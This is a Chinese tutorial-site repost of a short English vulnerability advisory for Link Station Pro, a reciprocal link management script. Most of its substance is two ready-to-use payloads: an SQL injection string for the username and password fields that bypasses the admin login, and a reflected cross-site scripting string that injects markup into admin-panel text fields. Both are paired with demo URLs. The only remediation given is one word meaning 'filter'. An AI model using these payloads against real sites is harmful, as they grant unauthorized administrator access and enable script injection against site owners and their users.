好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Link Station Pro多重缺陷及修复 - 网站安全 - 自学

 BREIF DESCRIPTION 

***************************** 

 Link Station Pro is without doubt, the most efficient, easiest and most 

configurable reciprocal link management tool available for all your 

reciprocal link requirements. 

  

****************************************************************************************************************************   

(Auth ByPass) SQLi Vulnerability 

*************************************** 

{DEMO} : http://HdhCmsTest2cto测试数据 /Partners/admindemo/index.php 

  

EXPLOIT: 

                 Username: ' or 'bug'='bug' # 

                 Password: ' or 'bug'='bug' # 

Observe: Attackers can use Authentication Bypass to get into Admin Panel in 

the site. 

  

Reflected XSS Vulnerability 

******************************** 

EXPLOIT 2:  XSS Vulnerability in admin panel(in most of the text fields) 

  

   {Demo}: 

http://HdhCmsTest2cto测试数据 /Partners/admindemo/manage_categories.php 

    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee> 

   修复:过滤

查看更多关于Link Station Pro多重缺陷及修复 - 网站安全 - 自学的详细内容...

  阅读:40次